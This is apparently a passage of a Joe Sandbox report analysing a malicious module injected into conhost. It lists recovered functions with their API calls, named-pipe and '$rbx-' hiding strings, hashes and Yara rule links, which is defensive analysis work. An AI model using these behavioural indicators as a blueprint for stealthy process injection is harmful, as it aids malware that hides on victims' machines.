Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction ID: 49c538d9f274928a7a15f106f246729a10ecaad517e54f769904ce9b8c6ea64c
Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction Fuzzy Hash: EAD1AD7A706B808AEB20DF75D44C39D77A0F785B98F108216EE8957B9ADF38C581C702

Function 00000286D7D1104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99
memoryregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000286D7D110B1
RegEnumValueW.ADVAPI32 ref: 00000286D7D11117
GetProcessHeap.KERNEL32 ref: 00000286D7D1115A
HeapAlloc.KERNEL32 ref: 00000286D7D11168
GetProcessHeap.KERNEL32 ref: 00000286D7D11185
HeapFree.KERNEL32 ref: 00000286D7D11193

Strings

d, xrefs: 00000286D7D110D6

Memory Dump Source

Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true

Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction ID: abfed3858995a180f9d24efc7e382adbbe90bf586b89948eee518cff946b9889
Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction Fuzzy Hash: AD415C37215B84DAE760CF21E44C79EB7A1F388B98F448129DA8A07B58DF39C589CB51

Function 00000286D7D12518 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44
filethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessIdOfThread.KERNEL32 ref: 00000286D7D1252D
GetCurrentProcessId.KERNEL32 ref: 00000286D7D12537
CreateFileW.KERNEL32 ref: 00000286D7D12568
WriteFile.KERNEL32 ref: 00000286D7D12590
ReadFile.KERNEL32 ref: 00000286D7D125AF
CloseHandle.KERNEL32 ref: 00000286D7D125B8

Strings

\\.\pipe\$rbx-childproc, xrefs: 00000286D7D12549

Memory Dump Source

Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true

Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd

Similarity

API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
String ID: \\.\pipe\$rbx-childproc
API String ID: 166002920-1828357524
Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction ID: 36f37a685392f0846ca6968756017cddc7f219cdfe43ada4cf4565d9af43ecbb
Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction Fuzzy Hash: 56115E3A719B4083F7208B21F95DB5A7761F389BD4F948315EA5A02BA8DF7CC145CB41

Function 00000286D7CE7050 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00000286D7CE7078
__scrt_acquire_startup_lock.LIBCMT ref: 00000286D7CE70CA
_RTC_Initialize.LIBCMT ref: 00000286D7CE70F8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00000286D7CE711E
__scrt_release_startup_lock.LIBCMT ref: 00000286D7CE7149

Memory Dump Source

Source File: 00000015.00000003.2188000714.00000286D7CE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000286D7CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_3_286d7ce0000_conhost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: 04fa1f497b0d436201064a6d981f0fa5178cfbea8544f8ed5d88852615694ca1
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: 968190397037498EFB64AB65A84F39DA2D1EB86780F44C0259A09C7796DF38C947C703

Function 00000286D7D17C50 Relevance: 12.2, APIs: 8, Instructions: 227
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00000286D7D17C78
__scrt_acquire_startup_lock.LIBCMT ref: 00000286D7D17CCA
_RTC_Initialize.LIBCMT ref: 00000286D7D17CF8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00000286D7D17D1E
__scrt_release_startup_lock.LIBCMT ref: 00000286D7D17D49

Memory Dump Source

Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true

Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: 67a902cb688c193513fe44a82715359f62962eac3d08b576ea781e36d422a8a5
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: 4881283D7073058AFB60EB65D44D3A966D1ABA57B4F68C024AD09473A7DF38C842C303

Function 00000286D7D19AAC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(?,?,?,00000286D7D19C6B,?,?,?,00000286D7D1945C,?,?,?,?,00000286D7D18F65), ref: 00000286D7D19B31
GetLastError.KERNEL32(?,?,?,00000286D7D19C6B,?,?,?,00000286D7D1945C,?,?,?,?,00000286D7D18F65), ref: 00000286D7D19B3F
LoadLibraryExW.KERNEL32(?,?,?,00000286D7D19C6B,?,?,?,00000286D7D1945C,?,?,?,?,00000286D7D18F65), ref: 00000286D7D19B69
FreeLibrary.KERNEL32(?,?,?,00000286D7D19C6B,?,?,?,00000286D7D1945C,?,?,?,?,00000286D7D18F65), ref: 00000286D7D19BD7
GetProcAddress.KERNEL32(?,?,?,00000286D7D19C6B,?,?,?,00000286D7D1945C,?,?,?,?,00000286D7D18F65), ref: 00000286D7D19BE3

Strings

api-ms-, xrefs: 00000286D7D19B51

Memory Dump Source

Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true

Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction ID: f0188f5c7becbff5819978b271a445e2260325ab37ddd892b9837f85b760f15c
Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction Fuzzy Hash: 0B31CF39313B8091EE22DF16A98C7A927D4FB48BA4F598625ED1E4B794EF38C445C312

Function 00000286D7D23400 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00000286D7D23431
GetLastError.KERNEL32 ref: 00000286D7D2343D
CloseHandle.KERNEL32 ref: 00000286D7D23455
CreateFileW.KERNEL32 ref: 00000286D7D23480
WriteConsoleW.KERNEL32 ref: 00000286D7D2349F

Strings

CONOUT$, xrefs: 00000286D7D23461

Memory Dump Source

Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true

Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction ID: 17009556d7e8c6057e17ceaf32a05bbe11f767524343631868a8f992ba611407
Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction Fuzzy Hash: 2D11C439311B8086E7608B52FC5CB1977A0F788FE4F408264EA5E87B94DF38C405C741

Function 00000286D7D16270 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000286D7D162AB
GetThreadContext.KERNEL32 ref: 00000286D7D16415

Part of subcall function 00000286D7D160A0: GetCurrentThreadId.KERNEL32 ref: 00000286D7D160A4

Memory Dump Source

Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true

Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction ID: e9c37d4e8d76c5be68c1e77b1dea35698f2fc3b4cae5ab4576a84ca99d02defe
Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction Fuzzy Hash: FCD18A7A309B8882DA70DB1AE49835A77B1F388B98F508116EECD477A9DF3CC551CB01

Function 00000286D7D12098 Relevance: 9.1, APIs: 6, Instructions: 113threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00000286D7D120A6
TlsFree.KERNEL32 ref: 00000286D7D1225F
TlsFree.KERNEL32 ref: 00000286D7D1226B
TlsFree.KERNEL32 ref: 00000286D7D12277
TlsFree.KERNEL32 ref: 00000286D7D12283
TlsFree.KERNEL32 ref: 00000286D7D1228F

Part of subcall function 00000286D7D15E50: GetCurrentThreadId.KERNEL32 ref: 00000286D7D15E66

Memory Dump Source

Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true

Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd

Similarity

API ID: Free$CurrentThread
String ID:
API String ID: 564911740-0
Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction ID: 5ec789d24f81da2a0e0e28f7d413bdf122b34961f5f48978cde41563df8ee1ad
Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction Fuzzy Hash: 3C51033C313F4685EF05DF28EC9D29823A1FB04748F84C815A92E067A9EF79D569C352

Function 00000286D7D135C8 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,00000286D7D124D1), ref: 00000286D7D135EB
HeapAlloc.KERNEL32(?,?,?,?,?,00000286D7D124D1), ref: 00000286D7D135FE
StrCmpNIW.SHLWAPI(?,?,?,?,?,00000286D7D124D1), ref: 00000286D7D13673
GetProcessHeap.KERNEL32(?,?,?,?,?,00000286D7D124D1), ref: 00000286D7D136D9
HeapFree.KERNEL32(?,?,?,?,?,00000286D7D124D1), ref: 00000286D7D136E7

Strings

$rbx-, xrefs: 00000286D7D1366C

Memory Dump Source

Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true

Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: $rbx-
API String ID: 756756679-3661604363
Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction ID: d88c54b80e8b2d2bed6a9e02165b7adb7c035e998c04ed35f6ea6efbe8163ca3
Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction Fuzzy Hash: EA316A2A702F5596EA25DF26E94C769A3A0FB54B84F0AC020DF4947B65EF38C4A2C701

Function 00000286D7D1C940 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00000286D7D1C94F
SetLastError.KERNEL32 ref: 00000286D7D1C96E
FlsSetValue.KERNEL32 ref: 00000286D7D1C997
FlsSetValue.KERNEL32 ref: 00000286D7D1C9A8
FlsSetValue.KERNEL32 ref: 00000286D7D1C9B9

Part of subcall function 00000286D7D1D2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,00000286D7D1674A), ref: 00000286D7D1D2B6
Part of subcall function 00000286D7D1D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,00000286D7D1674A), ref: 00000286D7D1D2C0

SetLastError.KERNEL32 ref: 00000286D7D1C9DC

Memory Dump Source

Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true

Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd

Similarity

API ID: ErrorLast$Value$FreeHeap
String ID:
API String ID: 365477584-0
Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction ID: d9d3101f8a586cadd2f9614159f46197d7e617b88e760b54fca558878f0fa247
Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction Fuzzy Hash: 1C11A52D70325042FA18A771691E37E2252AB85BA0F94C665EC6B6B7CAEF3CC401C303

Function 00000286D7D11A30 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 00000286D7D11A56
K32GetModuleFileNameExW.KERNEL32 ref: 00000286D7D11A74
PathFindFileNameW.SHLWAPI ref: 00000286D7D11A83
lstrlenW.KERNEL32 ref: 00000286D7D11A8F
StrCpyW.SHLWAPI ref: 00000286D7D11AA2
CloseHandle.KERNEL32 ref: 00000286D7D11AB0

Memory Dump Source

Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true

Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction ID: f866141e6c5fa2a78c69f847e738935b8caf16b38e64789451a649bf0307e5bb
Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction Fuzzy Hash: BA018039706B4082EB20DB12E95C75963A1F788FD4F488074DE4E43754DE3CC58AC781

Function 00000286D7D13E14 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,00000286D7D13AAC), ref: 00000286D7D13E30
GetCurrentProcess.KERNEL32(?,?,?,?,?,00000286D7D13AAC), ref: 00000286D7D13E3E
VirtualProtectEx.KERNEL32(?,?,?,?,?,00000286D7D13AAC), ref: 00000286D7D13E60
GetCurrentProcess.KERNEL32(?,?,?,?,?,00000286D7D13AAC), ref: 00000286D7D13E7E
VirtualProtectEx.KERNEL32(?,?,?,?,?,00000286D7D13AAC), ref: 00000286D7D13E9F
TerminateThread.KERNEL32(?,?,?,?,?,00000286D7D13AAC), ref: 00000286D7D13EAE

Memory Dump Source

Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true

Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction ID: ac7c4ac7de9aee15495a2e589d8e7e5a6b981f5f1e7ede2aed1248f51b95cd8f
Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
Instruction Fuzzy Hash: C0014C69313B40C2FB349B21E84DB1973A0BB49B59F048128DE4E163A4FF3EC049C746

Function 00000286D7D11AD4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 00000286D7D11AF4
StrCmpNIW.SHLWAPI ref: 00000286D7D11B0E
lstrlenW.KERNEL32 ref: 00000286D7D11B1D
StrCpyW.SHLWAPI ref: 00000286D7D11B32

Strings

\\?\, xrefs: 00000286D7D11B02

Memory Dump Source

Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true

Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction ID: 17ed52745e365a8408c84ca6bb622ccf60e65b3c4597bb30f6ce6b04dad794eb
Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction Fuzzy Hash: 81F0AF3631568492EB308B20F98C7596760F744B98F84C021CA4A42964EE6CC689CB01

Function 00000286D7D1B904 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00000286D7D1B929
GetProcAddress.KERNEL32 ref: 00000286D7D1B93F
FreeLibrary.KERNEL32 ref: 00000286D7D1B95B

Strings

CorExitProcess, xrefs: 00000286D7D1B938
mscoree.dll, xrefs: 00000286D7D1B920

Memory Dump Source

Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true

Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction ID: 3acc293646c395c00861105a007a814ec3c1d58159ea3ed2bdd10760442ca137
Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction Fuzzy Hash: 19F0B46930270181EB208B24E88D7692330EB89765F548359DA6A465E4DF3CC44AC352

Function 00000286D7D13708 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI(?,?,00000000,00000286D7D1275A), ref: 00000286D7D1372A
StrCpyW.SHLWAPI ref: 00000286D7D1373A
StrCatW.SHLWAPI ref: 00000286D7D13746
PathCombineW.SHLWAPI(?,?,00000000,00000286D7D1275A), ref: 00000286D7D13754

Strings

\\.\pipe\, xrefs: 00000286D7D13720

Memory Dump Source

Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true

Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction ID: 4fc6375478b0a17b877521579f7908c5893f33443ddc84f2a485429732663030
Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction Fuzzy Hash: 6DF08C68309B8082EA249B13B91C129A260BB48FC4F88E071EE4B47B18CE3CC447C701

Function 00000286D7D15810 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00000286D7D15896

Memory Dump Source

Source File: 00000015.00000002.2580462223.00000286D7D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000286D7D10000, based on PE: true

Associated: 00000015.00000002.2579208440.00000286D7D10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2582104557.00000286D7D25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2583461462.00000286D7D30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2584648661.00000286D7D32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000015.00000002.2585766124.00000286D7D39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_286d7d10000_conhost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
